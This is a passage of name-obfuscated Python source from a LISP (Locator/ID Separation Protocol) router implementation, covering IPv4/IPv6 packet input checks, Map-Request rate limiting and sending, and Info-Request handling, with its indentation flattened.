if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if 96 - 96: I1IiiI . oO0o % O0
Ii11Ii = None
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( iiiiII != iii1i . dns_name ) : continue
if ( Ii11Ii == None or iii1i . last_used < Ii11Ii . last_used ) : Ii11Ii = iii1i
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
return ( Ii11Ii )
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
if 23 - 23: o0oOOo0O0Ooo . o0oOOo0O0Ooo - iIii1I11I1II1 / o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + I1Ii111 . I1ii11iIi11i . OoOoOO00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
if 2 - 2: oO0o % iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
if 45 - 45: II111iiii . iII111i
def lisp_ipv4_input ( packet ) :
if 55 - 55: ooOoO0o / iII111i / O0
if 98 - 98: O0 % iII111i + II111iiii
if 13 - 13: I1IiiI * oO0o - o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + oO0o . oO0o / o0oOOo0O0Ooo
if ( ord ( packet [ 9 : 10 ] ) == 2 ) : return ( [ True , packet ] )
if 77 - 77: i1IIi * o0oOOo0O0Ooo * IiII
if 24 - 24: i11iIiiIii / iIii1I11I1II1 / iII111i
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
if 36 - 36: O0
ii1II1II = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( ii1II1II == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
ii1II1II = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( ii1II1II != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
if 21 - 21: i1IIi * iII111i + OoO0O00
if 27 - 27: I11i / oO0o . iII111i + o0oOOo0O0Ooo - OOooOOo
if 85 - 85: OoooooooOO
if 83 - 83: iII111i * I11i . OOooOOo - OoO0O00 % IiII
if 8 - 8: I1Ii111
O0O00O = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( O0O00O == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( O0O00O == 1 ) :
dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 86 - 86: ooOoO0o + iII111i * O0 % OoO0O00 + OoOoOO00
return ( [ False , None ] )
if 49 - 49: OOooOOo / i1IIi - II111iiii . iIii1I11I1II1 + I11i . OOooOOo
if 9 - 9: iIii1I11I1II1 + Ii1I + I11i
O0O00O -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , O0O00O ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 96 - 96: OoO0O00 + i11iIiiIii + OoO0O00
if 7 - 7: i1IIi . I1IiiI
if 68 - 68: OoooooooOO
if 91 - 91: IiII . ooOoO0o * I11i
if 39 - 39: o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
def lisp_ipv6_input ( packet ) :
IIi11ii = packet . inner_dest
packet = packet . packet
if 63 - 63: OoOoOO00 - iII111i
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
O0O00O = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( O0O00O == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( O0O00O == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
return ( None )
if 56 - 56: I1Ii111 / iIii1I11I1II1 % IiII * iIii1I11I1II1 . I1ii11iIi11i . OOooOOo
if 1 - 1: Ii1I . Ii1I % II111iiii + I11i + OoOoOO00
if 52 - 52: OoooooooOO - OoO0O00
if 24 - 24: iII111i / Oo0Ooo - I1ii11iIi11i + o0oOOo0O0Ooo
if 44 - 44: OoOoOO00 + I1IiiI . I1ii11iIi11i / i1IIi + II111iiii . Oo0Ooo
if ( IIi11ii . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 39 - 39: o0oOOo0O0Ooo
if 64 - 64: oO0o - i11iIiiIii
O0O00O -= 1
packet = packet [ 0 : 7 ] + struct . pack ( "B" , O0O00O ) + packet [ 8 : : ]
return ( packet )
if 62 - 62: OoooooooOO - OoooooooOO / OoO0O00 - II111iiii . iIii1I11I1II1
if 2 - 2: O0 + o0oOOo0O0Ooo % OOooOOo . ooOoO0o % i1IIi
if 21 - 21: OoOoOO00 / OoooooooOO + I1Ii111 - IiII
if 62 - 62: Oo0Ooo % iII111i + OoooooooOO - I1ii11iIi11i % iII111i % iIii1I11I1II1
if 54 - 54: IiII + OoOoOO00 / II111iiii % i11iIiiIii . I1Ii111
if 69 - 69: i1IIi + ooOoO0o + Ii1I
if 88 - 88: OoOoOO00 + iII111i % O0 + OOooOOo / OoooooooOO / OOooOOo
if 95 - 95: ooOoO0o . Oo0Ooo % IiII + iII111i
def lisp_mac_input ( packet ) :
return ( packet )
if 16 - 16: I11i * OoO0O00 % o0oOOo0O0Ooo - O0 % II111iiii - I1IiiI
if 72 - 72: OoooooooOO * OoOoOO00 . OOooOOo + Ii1I . OOooOOo / II111iiii
if 8 - 8: i1IIi
if 1 - 1: OoOoOO00 . OoO0O00 . OoO0O00 * O0
if 97 - 97: OoooooooOO % ooOoO0o . I1Ii111 / iII111i
if 59 - 59: II111iiii + O0 . I1ii11iIi11i . Oo0Ooo * OoO0O00
if 35 - 35: oO0o / I1Ii111 * OOooOOo + OoooooooOO . IiII
if 1 - 1: I1IiiI + I1Ii111 / OOooOOo . Ii1I . oO0o / I1ii11iIi11i
if 54 - 54: OOooOOo
def lisp_rate_limit_map_request ( dest ) :
O000oo = lisp_get_timestamp ( )
if 86 - 86: oO0o * Oo0Ooo / OOooOOo
if 18 - 18: II111iiii - I1Ii111
if 13 - 13: i11iIiiIii - O0 % OoOoOO00 + OOooOOo * ooOoO0o
if 55 - 55: i1IIi - OOooOOo / I11i * Ii1I
i1i111Iiiiiii = O000oo - lisp_no_map_request_rate_limit
if ( i1i111Iiiiiii < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME ) :
iIi1I1 = int ( LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - i1i111Iiiiiii )
dprint ( "No Rate-Limit Mode for another {} secs" . format ( iIi1I1 ) )
return ( False )
if 20 - 20: OoOoOO00 * iIii1I11I1II1 % O0 - i1IIi
if 51 - 51: I1ii11iIi11i * Ii1I - oO0o / O0 * OoooooooOO
if 12 - 12: i1IIi / iIii1I11I1II1 / O0 * OoO0O00
if 15 - 15: i11iIiiIii / IiII + Ii1I % OOooOOo % I1ii11iIi11i * oO0o
if 24 - 24: OOooOOo / OOooOOo + I11i / iII111i . oO0o - iII111i
if ( lisp_last_map_request_sent == None ) : return ( False )
i1i111Iiiiiii = O000oo - lisp_last_map_request_sent
IiIiI1I1Ii = ( i1i111Iiiiiii < LISP_MAP_REQUEST_RATE_LIMIT )
if 59 - 59: I1ii11iIi11i % II111iiii - i11iIiiIii - I1Ii111
if ( IiIiI1I1Ii ) :
dprint ( "Rate-limiting Map-Request for {}, sent {} secs ago" . format ( green ( dest . print_address ( ) , False ) , round ( i1i111Iiiiiii , 3 ) ) )
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
return ( IiIiI1I1Ii )
if 40 - 40: o0oOOo0O0Ooo / iII111i . o0oOOo0O0Ooo
if 63 - 63: o0oOOo0O0Ooo * iIii1I11I1II1 * II111iiii . OoO0O00 - oO0o / OoOoOO00
if 78 - 78: i11iIiiIii / OoO0O00 / i1IIi . i11iIiiIii
if 100 - 100: II111iiii . IiII . I11i
if 60 - 60: OoOoOO00 % OOooOOo * i1IIi
if 3 - 3: OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ,
pubsub = False ) :
global lisp_last_map_request_sent
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
if 8 - 8: ooOoO0o / II111iiii . I1ii11iIi11i * ooOoO0o % oO0o
if 36 - 36: I1ii11iIi11i % OOooOOo - ooOoO0o - I11i + I1IiiI
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
Ii11I1Ii1 = iiiI111i1iIi = None
if ( rloc ) :
Ii11I1Ii1 = rloc . rloc
iiiI111i1iIi = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 99 - 99: iIii1I11I1II1 + O0 + OoooooooOO % I1IiiI - OoOoOO00 / oO0o
if 22 - 22: iIii1I11I1II1 . I11i
if 21 - 21: I1IiiI % Oo0Ooo - II111iiii / I1IiiI . OoOoOO00 - o0oOOo0O0Ooo
if 23 - 23: OoOoOO00 / O0 * OoOoOO00 . I1IiiI + Oo0Ooo . iII111i
if 1 - 1: i11iIiiIii * OoO0O00 - OoooooooOO + OoooooooOO
Ii1I1iI1i , oOii11I111 , ooO000OO = lisp_myrlocs
if ( Ii1I1iI1i == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 89 - 89: I1ii11iIi11i . OoooooooOO
if ( oOii11I111 == None and Ii11I1Ii1 != None and Ii11I1Ii1 . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 61 - 61: i1IIi + i11iIiiIii
if 59 - 59: i11iIiiIii * OOooOOo + i1IIi * iIii1I11I1II1 + I11i
O0Ooo = lisp_map_request ( )
O0Ooo . record_count = 1
O0Ooo . nonce = lisp_get_control_nonce ( )
O0Ooo . rloc_probe = ( Ii11I1Ii1 != None )
O0Ooo . subscribe_bit = pubsub
O0Ooo . xtr_id_present = pubsub
if 97 - 97: OoO0O00 - I11i . OoooooooOO
if 58 - 58: I1ii11iIi11i / II111iiii / i11iIiiIii
if 27 - 27: iIii1I11I1II1 - O0 + OoOoOO00
if 28 - 28: oO0o . IiII * iII111i % Oo0Ooo - OoO0O00 / I11i
if 67 - 67: i11iIiiIii + i11iIiiIii / ooOoO0o - o0oOOo0O0Ooo
if 94 - 94: O0 + OoO0O00 / I1IiiI * II111iiii * i11iIiiIii
if 55 - 55: OoooooooOO * O0 + i1IIi % I1IiiI
if ( rloc ) : rloc . last_rloc_probe_nonce = O0Ooo . nonce
if 10 - 10: II111iiii - Ii1I . I11i . O0 + Ii1I
I1iiIiI1II1ii = deid . is_multicast_address ( )
if ( I1iiIiI1II1ii ) :
O0Ooo . target_eid = seid
O0Ooo . target_group = deid
else :
O0Ooo . target_eid = deid
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
if 21 - 21: I1ii11iIi11i - ooOoO0o
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
if ( O0Ooo . rloc_probe == False ) :
OoO0oO = lisp_get_signature_eid ( )
if ( OoO0oO ) :
O0Ooo . signature_eid . copy_address ( OoO0oO . eid )
O0Ooo . privkey_filename = "./lisp-sig.pem"
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
if 86 - 86: o0oOOo0O0Ooo * i11iIiiIii - I11i
if 71 - 71: OoO0O00 - I11i
if ( seid == None or I1iiIiI1II1ii ) :
O0Ooo . source_eid . afi = LISP_AFI_NONE
else :
O0Ooo . source_eid = seid
if 96 - 96: I1Ii111 / Ii1I
if 65 - 65: I1ii11iIi11i * O0 . IiII
if 11 - 11: I11i / Ii1I % oO0o
if 50 - 50: i11iIiiIii
if 93 - 93: i1IIi / Ii1I * II111iiii - Oo0Ooo . OoOoOO00 - OOooOOo
if 25 - 25: I11i / ooOoO0o % ooOoO0o - OOooOOo
if 59 - 59: I1IiiI + o0oOOo0O0Ooo . iIii1I11I1II1 - O0 - i11iIiiIii
if 4 - 4: I1IiiI
if 36 - 36: Ii1I
if 76 - 76: i11iIiiIii + i1IIi
if 56 - 56: OoOoOO00 + II111iiii / i11iIiiIii * OoOoOO00 * OoooooooOO
if 15 - 15: OoOoOO00 / OoooooooOO + OOooOOo
if ( Ii11I1Ii1 != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( Ii11I1Ii1 . is_private_address ( ) == False ) :
Ii1I1iI1i = lisp_get_any_translated_rloc ( )
if 76 - 76: Ii1I * iII111i . OoooooooOO
if ( Ii1I1iI1i == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 92 - 92: iIii1I11I1II1 - Oo0Ooo - I1IiiI - OOooOOo * I1Ii111
if 44 - 44: I1Ii111 - II111iiii / OOooOOo
if 50 - 50: I11i / I1ii11iIi11i
if 60 - 60: II111iiii / Ii1I + OoO0O00 % I1IiiI * i1IIi / II111iiii
if 91 - 91: I1IiiI * I1Ii111 * i11iIiiIii - oO0o - IiII + I1ii11iIi11i
if 99 - 99: OoO0O00 % o0oOOo0O0Ooo
if 3 - 3: OOooOOo / OoOoOO00 % iIii1I11I1II1
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
if ( Ii11I1Ii1 == None or Ii11I1Ii1 . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and Ii11I1Ii1 == None ) :
i1Oo = lisp_get_any_translated_rloc ( )
if ( i1Oo != None ) : Ii1I1iI1i = i1Oo
if 45 - 45: OoO0O00 + OoOoOO00 + o0oOOo0O0Ooo
O0Ooo . itr_rlocs . append ( Ii1I1iI1i )
if 70 - 70: OOooOOo % OoOoOO00
if ( Ii11I1Ii1 == None or Ii11I1Ii1 . is_ipv6 ( ) ) :
if ( oOii11I111 == None or oOii11I111 . is_ipv6_link_local ( ) ) :
oOii11I111 = None
else :
O0Ooo . itr_rloc_count = 1 if ( Ii11I1Ii1 == None ) else 0
O0Ooo . itr_rlocs . append ( oOii11I111 )
if 86 - 86: OoooooooOO + OOooOOo + OOooOOo + I1Ii111 + OoooooooOO + ooOoO0o
if 84 - 84: OoOoOO00 * OoOoOO00 % ooOoO0o % II111iiii / iII111i + Oo0Ooo
if 95 - 95: iII111i . oO0o % iIii1I11I1II1 - I1IiiI
if 38 - 38: ooOoO0o % iIii1I11I1II1 - OOooOOo
if 13 - 13: OOooOOo . i11iIiiIii
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
if 79 - 79: oO0o
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
if ( Ii11I1Ii1 != None and O0Ooo . itr_rlocs != [ ] ) :
iiII1 = O0Ooo . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
iiII1 = Ii1I1iI1i
elif ( deid . is_ipv6 ( ) ) :
iiII1 = oOii11I111
else :
iiII1 = Ii1I1iI1i
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
if 10 - 10: OoOoOO00 % I11i
if 49 - 49: oO0o % ooOoO0o + II111iiii
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
Oo00oo = O0Ooo . encode ( Ii11I1Ii1 , iiiI111i1iIi )
O0Ooo . print_map_request ( )
if 99 - 99: OoOoOO00
if 46 - 46: I1ii11iIi11i / II111iiii / OoooooooOO / Ii1I
if 37 - 37: I1ii11iIi11i - Ii1I / oO0o . I1IiiI % I1Ii111
if 8 - 8: oO0o
if 46 - 46: I1Ii111 + IiII + II111iiii . o0oOOo0O0Ooo + i11iIiiIii
if 97 - 97: o0oOOo0O0Ooo % OoOoOO00 * O0 / iIii1I11I1II1 * OoO0O00 / i11iIiiIii
if ( Ii11I1Ii1 != None ) :
if ( rloc . is_rloc_translated ( ) ) :
iII1ii1 = lisp_get_nat_info ( Ii11I1Ii1 , rloc . rloc_name )
if 1 - 1: OoooooooOO . Ii1I
if 68 - 68: Ii1I
if 98 - 98: iII111i
if 33 - 33: OoO0O00 - ooOoO0o % O0 % iIii1I11I1II1 * iII111i - iII111i
if ( iII1ii1 == None ) :
iiiI1I = rloc . rloc . print_address_no_iid ( )
Oo = "gleaned-{}" . format ( iiiI1I )
iIIiiIi = rloc . translated_port
iII1ii1 = lisp_nat_info ( iiiI1I , Oo , iIIiiIi )
if 27 - 27: i11iIiiIii + I1ii11iIi11i + i1IIi
lisp_encapsulate_rloc_probe ( lisp_sockets , Ii11I1Ii1 , iII1ii1 ,
Oo00oo )
return
if 67 - 67: o0oOOo0O0Ooo
if 58 - 58: IiII % o0oOOo0O0Ooo + i1IIi
O0O0 = Ii11I1Ii1 . print_address_no_iid ( )
IIi11ii = lisp_convert_4to6 ( O0O0 )
lisp_send ( lisp_sockets , IIi11ii , LISP_CTRL_PORT , Oo00oo )
return
if 33 - 33: II111iiii
if 61 - 61: I1Ii111
if 56 - 56: I1ii11iIi11i - OoooooooOO
if 52 - 52: Oo0Ooo - I11i - IiII - OoOoOO00
if 21 - 21: oO0o % o0oOOo0O0Ooo + I1Ii111 . OOooOOo / OOooOOo
if 41 - 41: Oo0Ooo . ooOoO0o * oO0o
iIi11ii1II1i1 = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
iii1i = lisp_get_decent_map_resolver ( deid )
else :
iii1i = lisp_get_map_resolver ( None , iIi11ii1II1i1 )
if 38 - 38: OoooooooOO % iII111i
if ( iii1i == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 6 - 6: iII111i / OoOoOO00 / i11iIiiIii - o0oOOo0O0Ooo
return
if 35 - 35: ooOoO0o / I1Ii111 / I1Ii111
iii1i . last_used = lisp_get_timestamp ( )
iii1i . map_requests_sent += 1
if ( iii1i . last_nonce == 0 ) : iii1i . last_nonce = O0Ooo . nonce
if 19 - 19: OoO0O00 % i11iIiiIii % iIii1I11I1II1
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
if 14 - 14: I1Ii111 + Oo0Ooo
if ( seid == None ) : seid = iiII1
lisp_send_ecm ( lisp_sockets , Oo00oo , seid , lisp_ephem_port , deid ,
iii1i . map_resolver )
if 35 - 35: i11iIiiIii * Ii1I
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 91 - 91: I11i
if 54 - 54: I1ii11iIi11i / i1IIi
if 14 - 14: iIii1I11I1II1 * I11i . I11i * ooOoO0o * iII111i
if 60 - 60: iIii1I11I1II1 + i1IIi + oO0o - iIii1I11I1II1 . i11iIiiIii * OoooooooOO
iii1i . resolve_dns_name ( )
return
if 23 - 23: iII111i - IiII % i11iIiiIii
if 81 - 81: OoooooooOO % OoOoOO00 / IiII / OoooooooOO + i1IIi - O0
if 60 - 60: OOooOOo - I1Ii111 * Oo0Ooo
if 9 - 9: OoooooooOO * OOooOOo % OoO0O00 - ooOoO0o + Ii1I
if 39 - 39: iIii1I11I1II1 / i1IIi % I11i % I1ii11iIi11i * IiII
if 11 - 11: II111iiii + i1IIi
if 1 - 1: OOooOOo
if 23 - 23: i1IIi + OoooooooOO * OOooOOo . Oo0Ooo
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 83 - 83: OoooooooOO
if 53 - 53: o0oOOo0O0Ooo - Oo0Ooo / IiII + O0
if 88 - 88: Oo0Ooo % I1Ii111 * O0 - i1IIi * OoO0O00
if 74 - 74: Oo0Ooo % iIii1I11I1II1 + OOooOOo
iIiiI1II11 = lisp_info ( )
iIiiI1II11 . nonce = lisp_get_control_nonce ( )
if ( device_name ) : iIiiI1II11 . hostname += "-" + device_name
if 65 - 65: I1ii11iIi11i + O0 + iII111i + II111iiii
O0O0 = dest . print_address_no_iid ( )
if 100 - 100: I1Ii111
if 2 - 2: IiII - I1Ii111 . iIii1I11I1II1 - Ii1I * I11i
if 58 - 58: i1IIi % iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo + ooOoO0o
if 23 - 23: Oo0Ooo % Oo0Ooo / IiII
if 63 - 63: I11i % Oo0Ooo * I1Ii111 - Oo0Ooo % i11iIiiIii . II111iiii
if 44 - 44: I11i . I1Ii111 . I1ii11iIi11i . oO0o
if 1 - 1: I11i % II111iiii / OoO0O00 + OoO0O00
if 46 - 46: Oo0Ooo * Ii1I / IiII % O0 * iII111i
if 74 - 74: OoooooooOO + Ii1I
if 100 - 100: I1IiiI
if 59 - 59: I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
if 80 - 80: I1ii11iIi11i - I1ii11iIi11i
if 26 - 26: I1ii11iIi11i - I1IiiI * I1Ii111 % iIii1I11I1II1
if 77 - 77: o0oOOo0O0Ooo + I1Ii111 . OOooOOo . i1IIi . I1IiiI
if 100 - 100: ooOoO0o . i11iIiiIii + Ii1I - OOooOOo - i11iIiiIii - OoooooooOO
IIiIiII = False
if ( device_name ) :
O0ooooo0O = lisp_get_host_route_next_hop ( O0O0 )
if 73 - 73: I11i - oO0o . I1Ii111 + oO0o
if 48 - 48: IiII . IiII * o0oOOo0O0Ooo * II111iiii % ooOoO0o
if 40 - 40: I1ii11iIi11i
if 76 - 76: Oo0Ooo - I11i
if 82 - 82: OoO0O00 % oO0o . I11i / O0 - I1Ii111
if 39 - 39: I1IiiI
if 8 - 8: IiII * i1IIi * i1IIi * O0
if 69 - 69: Oo0Ooo
if 48 - 48: iII111i
if ( port == LISP_CTRL_PORT and O0ooooo0O != None ) :
while ( True ) :
time . sleep ( .01 )
O0ooooo0O = lisp_get_host_route_next_hop ( O0O0 )
if ( O0ooooo0O == None ) : break
if 11 - 11: i11iIiiIii * OoOoOO00 . OoO0O00
if 47 - 47: Oo0Ooo % I1Ii111 + ooOoO0o
if 89 - 89: iII111i
IIOoo0O = lisp_get_default_route_next_hops ( )
for ooO000OO , OoII1 in IIOoo0O :
if ( ooO000OO != device_name ) : continue
if 18 - 18: oO0o * IiII % oO0o
if 8 - 8: OoO0O00 * iII111i % OoooooooOO - I11i / I1IiiI % oO0o
if 50 - 50: iIii1I11I1II1 + i1IIi * Oo0Ooo * OoooooooOO - II111iiii
if 79 - 79: o0oOOo0O0Ooo * O0
if 49 - 49: I11i / OoO0O00 % IiII
if 62 - 62: oO0o % oO0o / o0oOOo0O0Ooo + I1IiiI + OOooOOo
if ( O0ooooo0O != OoII1 ) :
if ( O0ooooo0O != None ) :
lisp_install_host_route ( O0O0 , O0ooooo0O , False )
if 45 - 45: O0 . OoO0O00 % OOooOOo + iIii1I11I1II1 * iII111i % OoO0O00
lisp_install_host_route ( O0O0 , OoII1 , True )
IIiIiII = True
if 62 - 62: I1Ii111 - ooOoO0o + iIii1I11I1II1 % OOooOOo + Oo0Ooo
break
if 59 - 59: I1IiiI * II111iiii . i1IIi - i1IIi
if 23 - 23: oO0o * OoO0O00 % O0 . OoOoOO00 * Oo0Ooo
if 69 - 69: OoOoOO00 % I1ii11iIi11i % II111iiii * oO0o
if 100 - 100: i11iIiiIii . IiII - I1IiiI + I1Ii111
if 29 - 29: Oo0Ooo . I1IiiI % ooOoO0o * I1ii11iIi11i . iII111i
if 14 - 14: OoOoOO00 - O0 % Ii1I
Oo00oo = iIiiI1II11 . encode ( )
iIiiI1II11 . print_info ( )
if 19 - 19: iII111i / i1IIi * O0 - OoO0O00
if 8 - 8: I1ii11iIi11i / oO0o - OoooooooOO + ooOoO0o + o0oOOo0O0Ooo % i11iIiiIii
if 32 - 32: O0 + IiII
if 93 - 93: OoOoOO00 - I11i / iII111i - iIii1I11I1II1 + I11i % oO0o
i1IiI = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
i1IiI = bold ( i1IiI , False )
iIIiiIi = bold ( "{}" . format ( port ) , False )
OO0O00o0 = red ( O0O0 , False )
iiO0ooooOooo = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( iiO0ooooOooo , OO0O00o0 , iIIiiIi , i1IiI ) )
if 17 - 17: OOooOOo
if 75 - 75: Ii1I / i1IIi % I1ii11iIi11i . Ii1I
if 46 - 46: II111iiii * OoO0O00
if 77 - 77: ooOoO0o * I11i
if 85 - 85: OoO0O00 * I1Ii111 - OoooooooOO / iIii1I11I1II1 - i1IIi + Ii1I
if 76 - 76: iII111i * OoooooooOO
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , Oo00oo )
else :
IiIii1iIIII = lisp_data_header ( )
IiIii1iIIII . instance_id ( 0xffffff )
IiIii1iIIII = IiIii1iIIII . encode ( )
if ( IiIii1iIIII ) :
Oo00oo = IiIii1iIIII + Oo00oo
if 49 - 49: II111iiii - OOooOOo + II111iiii + OoOoOO00
if 51 - 51: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 % i1IIi - II111iiii + i11iIiiIii
if 62 - 62: I1ii11iIi11i - I1IiiI * i11iIiiIii % oO0o
if 63 - 63: II111iiii - Oo0Ooo
if 55 - 55: iIii1I11I1II1 / O0 * O0 * i11iIiiIii * OoooooooOO
if 94 - 94: II111iiii . II111iiii / OoOoOO00 % oO0o * i1IIi % Oo0Ooo
if 78 - 78: IiII - I1IiiI
if 59 - 59: oO0o + i1IIi - IiII % OOooOOo % iIii1I11I1II1
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , Oo00oo )
if 71 - 71: OoO0O00
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
if 54 - 54: Ii1I / I1IiiI
if 7 - 7: iIii1I11I1II1 . O0 + OOooOOo . Ii1I * Oo0Ooo
if 25 - 25: I1Ii111 . Oo0Ooo % II111iiii . IiII - O0
if 18 - 18: oO0o * OOooOOo
if ( IIiIiII ) :
lisp_install_host_route ( O0O0 , None , False )
if ( O0ooooo0O != None ) : lisp_install_host_route ( O0O0 , O0ooooo0O , True )
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i - I1ii11iIi11i / iIii1I11I1II1
return
if 42 - 42: iIii1I11I1II1 / OOooOOo - O0 * OoooooooOO / i1IIi
if 33 - 33: OOooOOo . o0oOOo0O0Ooo % OoO0O00 - I1Ii111 . OoooooooOO
if 96 - 96: II111iiii % I11i / Ii1I - i11iIiiIii
if 63 - 63: I1IiiI
if 15 - 15: iIii1I11I1II1 - I1ii11iIi11i % OoO0O00 * II111iiii / I11i + I11i
if 23 - 23: I1IiiI
if 51 - 51: i11iIiiIii / ooOoO0o - OoooooooOO + OoOoOO00 + oO0o
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 57 - 57: iIii1I11I1II1
if 19 - 19: Ii1I / o0oOOo0O0Ooo + O0 / iIii1I11I1II1 + II111iiii
if 3 - 3: oO0o % OoO0O00 % OOooOOo
if 64 - 64: o0oOOo0O0Ooo . II111iiii * IiII % Oo0Ooo + I11i - OoooooooOO
iIiiI1II11 = lisp_info ( )
packet = iIiiI1II11 . decode ( packet )
if ( packet == None ) : return
iIiiI1II11 . print_info ( )
if 58 - 58: ooOoO0o
if 15 - 15: O0 * OOooOOo * I11i + Ii1I * OoooooooOO + OOooOOo
if 77 - 77: O0
if 98 - 98: iII111i - iII111i % i1IIi - I1Ii111 . I1IiiI % o0oOOo0O0Ooo
if 38 - 38: IiII % OoOoOO00 . OOooOOo . I1ii11iIi11i
iIiiI1II11 . info_reply = True
